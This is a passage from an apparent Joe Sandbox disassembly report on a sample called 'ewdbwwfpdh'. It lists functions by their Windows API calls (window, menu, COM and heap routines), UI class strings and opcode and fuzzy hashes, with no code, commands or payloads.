                                                                                                    • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,001D07D1,80070057,?), ref: 001D08F4
                                                                                                    • CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,001D07D1,80070057,?,?), ref: 001D0900
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                                    • String ID:
                                                                                                    • API String ID: 3897988419-0
                                                                                                    • Opcode ID: 512fad3a325d30d28b1d0ef87e4ad833e4c519031c5cddf34fc4c7e89115f582
                                                                                                    • Instruction ID: 9f46e1749ed1c5bf0f3e40c3004b5e7ba66f8bcbeb6beb80be04a97faf9042d5
                                                                                                    • Opcode Fuzzy Hash: 512fad3a325d30d28b1d0ef87e4ad833e4c519031c5cddf34fc4c7e89115f582
                                                                                                    • Instruction Fuzzy Hash: D3018F72A01318AFDB128FA4EC48B9A7BBDEB48752F104025FA05D2312D770ED019BA0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 001E0BCB Relevance: 7.5, APIs: 6, Instructions: 41COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,001E0A39,?,001E3C56,?,00000001,001B3ACE,?), ref: 001E0BE0
                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,001E0A39,?,001E3C56,?,00000001,001B3ACE,?), ref: 001E0BED
                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,001E0A39,?,001E3C56,?,00000001,001B3ACE,?), ref: 001E0BFA
                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,001E0A39,?,001E3C56,?,00000001,001B3ACE,?), ref: 001E0C07
                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,001E0A39,?,001E3C56,?,00000001,001B3ACE,?), ref: 001E0C14
                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,001E0A39,?,001E3C56,?,00000001,001B3ACE,?), ref: 001E0C21
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CloseHandle
                                                                                                    • String ID:
                                                                                                    • API String ID: 2962429428-0
                                                                                                    • Opcode ID: 4958d41f72fbbe0f25860ae5fcf16403cfea2a78e5a2bff2fa20325c2d9d5356
                                                                                                    • Instruction ID: 75042a9ab274b09b19178ccb5f4954beb7ca515a2a747e3b019b28488be153c4
                                                                                                    • Opcode Fuzzy Hash: 4958d41f72fbbe0f25860ae5fcf16403cfea2a78e5a2bff2fa20325c2d9d5356
                                                                                                    • Instruction Fuzzy Hash: 5001EE75800B56CFCB32AF66D88080AFBF9FF503093108A3ED09252931C7B1A889CF80
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 001D64D3 Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 001D64E7
                                                                                                    • GetWindowTextW.USER32(00000000,?,00000100), ref: 001D64FE
                                                                                                    • MessageBeep.USER32(00000000), ref: 001D6516
                                                                                                    • KillTimer.USER32(?,0000040A), ref: 001D6532
                                                                                                    • EndDialog.USER32(?,00000001), ref: 001D654C
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 3741023627-0
                                                                                                    • Opcode ID: 3d97f2540970cf654e7cdc8910c17a364df2b040798a60d86a2484fa81e3eeaf
                                                                                                    • Instruction ID: d98c9c3212f0e16eae25cb75680e427a08e5aba07cd402c6dbfae0250a83e6ea
                                                                                                    • Opcode Fuzzy Hash: 3d97f2540970cf654e7cdc8910c17a364df2b040798a60d86a2484fa81e3eeaf
                                                                                                    • Instruction Fuzzy Hash: F901A430501704ABEB245F64FD4EB9677BCFF10B45F00065AB587A10E2DBF5AA94CB90
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 001A2630 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • _free.LIBCMT ref: 001A264E
                                                                                                      • Part of subcall function 001A2D58: RtlFreeHeap.NTDLL(00000000,00000000,?,001ADB71,00241DC4,00000000,00241DC4,00000000,?,001ADB98,00241DC4,00000007,00241DC4,?,001ADF95,00241DC4), ref: 001A2D6E
                                                                                                      • Part of subcall function 001A2D58: GetLastError.KERNEL32(00241DC4,?,001ADB71,00241DC4,00000000,00241DC4,00000000,?,001ADB98,00241DC4,00000007,00241DC4,?,001ADF95,00241DC4,00241DC4), ref: 001A2D80
                                                                                                    • _free.LIBCMT ref: 001A2660
                                                                                                    • _free.LIBCMT ref: 001A2673
                                                                                                    • _free.LIBCMT ref: 001A2684
                                                                                                    • _free.LIBCMT ref: 001A2695
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                    • String ID:
                                                                                                    • API String ID: 776569668-0
                                                                                                    • Opcode ID: 663b20ff6b6b337b0f4fa069080e587b64be8bb926b096c26aee726549f4454b
                                                                                                    • Instruction ID: e8b8374d78a94b462229ae84863b3f8d5dcddb027aa81a8d27f02ff0a8afc59d
                                                                                                    • Opcode Fuzzy Hash: 663b20ff6b6b337b0f4fa069080e587b64be8bb926b096c26aee726549f4454b
                                                                                                    • Instruction Fuzzy Hash: 5CF0DA7C8017209BC701EFB9BC098483B64BB27B51746060AF919A6676C7B119ABAF84
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 001F6B2D Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 324COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 001905D2: EnterCriticalSection.KERNEL32(0024170C,?,00000000,?,0017D1DA,00243540,00000001,00000000,?,?,001EEF39,?,?,00000000,00000001,?), ref: 001905DD
                                                                                                      • Part of subcall function 001905D2: LeaveCriticalSection.KERNEL32(0024170C,?,0017D1DA,00243540,00000001,00000000,?,?,001EEF39,?,?,00000000,00000001,?,00000001,00242430), ref: 0019061A
                                                                                                      • Part of subcall function 00190433: __onexit.LIBCMT ref: 00190439
                                                                                                    • __Init_thread_footer.LIBCMT ref: 001F6B95
                                                                                                      • Part of subcall function 00190588: EnterCriticalSection.KERNEL32(0024170C,00000000,?,0017D208,00243540,001B27E9,00000001,00000000,?,?,001EEF39,?,?,00000000,00000001,?), ref: 00190592
                                                                                                      • Part of subcall function 00190588: LeaveCriticalSection.KERNEL32(0024170C,?,0017D208,00243540,001B27E9,00000001,00000000,?,?,001EEF39,?,?,00000000,00000001,?,00000001), ref: 001905C5
                                                                                                      • Part of subcall function 001E3EF6: LoadStringW.USER32(00000066,?,00000FFF,0020DCEC), ref: 001E3F3E
                                                                                                      • Part of subcall function 001E3EF6: LoadStringW.USER32(?,?,00000FFF,?), ref: 001E3F64
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CriticalSection$EnterLeaveLoadString$Init_thread_footer__onexit
                                                                                                    • String ID: x3$$x3$$x3$
                                                                                                    • API String ID: 1072379062-3664864905
                                                                                                    • Opcode ID: 7f60ed7c72706d26c87a832d280c1828c195ce41609c1f80d66243d370136b6d
                                                                                                    • Instruction ID: 304d0ac3fd4f1dba2b61f2c6e2f22b782fb15a6cdec5acb7b3fb4c95f8a8518a
                                                                                                    • Opcode Fuzzy Hash: 7f60ed7c72706d26c87a832d280c1828c195ce41609c1f80d66243d370136b6d
                                                                                                    • Instruction Fuzzy Hash: C5C1C275A00109AFCB14DF98C891EBEB7B9FF58300F148069FA55AB292DB74ED45CB90
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 001DCA3D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 114windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 001DCAC6
                                                                                                    • DeleteMenu.USER32(?,00000007,00000000), ref: 001DCB0C
                                                                                                    • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00242990,00F36198), ref: 001DCB55
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Menu$Delete$InfoItem
                                                                                                    • String ID: 0
                                                                                                    • API String ID: 135850232-4108050209
                                                                                                    • Opcode ID: a33a5b4279582e6ddcd4f146c4e38bfa2f03593a09595a489d5d3e882420b21f
                                                                                                    • Instruction ID: 3c16734010eb6c8d4042fde663e7bb07df40f4b8da7231a511c2d97d6fb6fd7f
                                                                                                    • Opcode Fuzzy Hash: a33a5b4279582e6ddcd4f146c4e38bfa2f03593a09595a489d5d3e882420b21f
                                                                                                    • Instruction Fuzzy Hash: A341A0702053429FDB20DF24D846F2ABBE4AF94364F144A1FF96597391D770E944CB92
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00204D75 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 106COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0020DCD0,00000000,?,?,?,?), ref: 00204E09
                                                                                                    • GetWindowLongW.USER32 ref: 00204E26
                                                                                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00204E36
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$Long
                                                                                                    • String ID: SysTreeView32
                                                                                                    • API String ID: 847901565-1698111956
                                                                                                    • Opcode ID: bdc2e3cae48a074fa4084accc3790c6353079dfdbbec1aae55b38ae4c103bca4
                                                                                                    • Instruction ID: 37827dd887648fd92096d675a03eba6cd0d2ddf613cd170d38cbf26aa8f3ecc6
                                                                                                    • Opcode Fuzzy Hash: bdc2e3cae48a074fa4084accc3790c6353079dfdbbec1aae55b38ae4c103bca4
                                                                                                    • Instruction Fuzzy Hash: 4C318F71110306AFDF219E78DC45BEA7BA9FB59334F208719FA79931E2D770A8608750
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00204817 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 89windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 0020489F
                                                                                                    • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 002048B3
                                                                                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 002048D7
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$Window
                                                                                                    • String ID: SysMonthCal32
                                                                                                    • API String ID: 2326795674-1439706946
                                                                                                    • Opcode ID: 9d06dbae1fcfb2c3e938c26760dd0bde4625c3b18b11507a015b54a9156360a8
                                                                                                    • Instruction ID: 294aa7633ab80abf2ae32bbbf2f4231d2fe635532db7a433676e26fb2d9efaa2
                                                                                                    • Opcode Fuzzy Hash: 9d06dbae1fcfb2c3e938c26760dd0bde4625c3b18b11507a015b54a9156360a8
                                                                                                    • Instruction Fuzzy Hash: 8A21D172610319BFDF159F90DC46FEA3B79EF88724F104214FA156B1D1D6B1A8618BA0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00204116 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 0020419F
                                                                                                    • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 002041AF
                                                                                                    • MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 002041D5
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$MoveWindow
                                                                                                    • String ID: Listbox
                                                                                                    • API String ID: 3315199576-2633736733
                                                                                                    • Opcode ID: 3f562222e23972364b5ad6d49300286eaf055a0cb0a9d5fbc4a4cff4c7ba42e3
                                                                                                    • Instruction ID: fe18c8abe81867a9344d49afbc1e9a70716e44beb12d0d7064f728e445eded14
                                                                                                    • Opcode Fuzzy Hash: 3f562222e23972364b5ad6d49300286eaf055a0cb0a9d5fbc4a4cff4c7ba42e3
                                                                                                    • Instruction Fuzzy Hash: 0721C272620319BBEF119F54DC85FAB776EEF99750F00C114FA089B1D1C671ACA287A0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00204B4A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00204BAE
                                                                                                    • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00204BC3
                                                                                                    • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00204BD0
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend
                                                                                                    • String ID: msctls_trackbar32
                                                                                                    • API String ID: 3850602802-1010561917
                                                                                                    • Opcode ID: 61a5a0cdfd711a82bccf26f0e665bd5d5221850c12c6535c235d130e4db311d4
                                                                                                    • Instruction ID: 62d402d6851219bc4182b007d2b9fa50a3239f4061044f23701cd54d9192792c
                                                                                                    • Opcode Fuzzy Hash: 61a5a0cdfd711a82bccf26f0e665bd5d5221850c12c6535c235d130e4db311d4
                                                                                                    • Instruction Fuzzy Hash: 92112371250308BEEF206E65CC06FAB7BA8EF85B18F014514FA54E20E1D671D8218B20
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 002061E1 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00206220
                                                                                                    • SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 0020624D
                                                                                                    • DrawMenuBar.USER32(?), ref: 0020625C
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Menu$InfoItem$Draw
                                                                                                    • String ID: 0
                                                                                                    • API String ID: 3227129158-4108050209
                                                                                                    • Opcode ID: 8aa9c4512bd7e46df0ddb8ec273572342178211183b4ff9a7042cf5d5efb0837
                                                                                                    • Instruction ID: 8389cc425b0c78308d88acb4ee9f5346514ca8803678086517bd512868122b3f
                                                                                                    • Opcode Fuzzy Hash: 8aa9c4512bd7e46df0ddb8ec273572342178211183b4ff9a7042cf5d5efb0837
                                                                                                    • Instruction Fuzzy Hash: D6016931511318EFDB219F51DC88BAA7FB4FF48351F1480AAF849D6192DB708AA4EF21
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 001D090F Relevance: 6.3, APIs: 4, Instructions: 322COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 298ae986d6758492fedbceeea6f93812f449149b70276587c1d77128a90bd1b4
                                                                                                    • Instruction ID: e21aa6b5686132d4b97d554a65fe2d855c96ad0cb3acec2fe05d268eaeca245c
                                                                                                    • Opcode Fuzzy Hash: 298ae986d6758492fedbceeea6f93812f449149b70276587c1d77128a90bd1b4
                                                                                                    • Instruction Fuzzy Hash: B7C15A75A0020AEFDB15CFA4C894BAAB7B5FF48704F11859AE505EB351D731EE81CB90
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 001A4210 Relevance: 6.3, APIs: 4, Instructions: 305COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: __alldvrm$_strrchr
                                                                                                    • String ID:
                                                                                                    • API String ID: 1036877536-0
                                                                                                    • Opcode ID: 173a905e0583d248f4586312a6838000a577cfe73f6efb9ac5c35750ff0a0cfb
                                                                                                    • Instruction ID: 5d10387cdb3386f3f2b47d15122336c7767f2d1cf96afc0e583403a9d38d5986
                                                                                                    • Opcode Fuzzy Hash: 173a905e0583d248f4586312a6838000a577cfe73f6efb9ac5c35750ff0a0cfb
                                                                                                    • Instruction Fuzzy Hash: 83A1497AA003969FDB25CF58C8917BEBBE4EFAA310F18416DE5859B241C3B48D41C750
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 001D0CC6 Relevance: 6.2, APIs: 4, Instructions: 230COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00210BD4,?), ref: 001D0E80
                                                                                                    • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00210BD4,?), ref: 001D0E98
                                                                                                    • CLSIDFromProgID.OLE32(?,?,00000000,0020DCE0,000000FF,?,00000000,00000800,00000000,?,00210BD4,?), ref: 001D0EBD
                                                                                                    • _memcmp.LIBVCRUNTIME ref: 001D0EDE
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FromProg$FreeTask_memcmp
                                                                                                    • String ID:
                                                                                                    • API String ID: 314563124-0
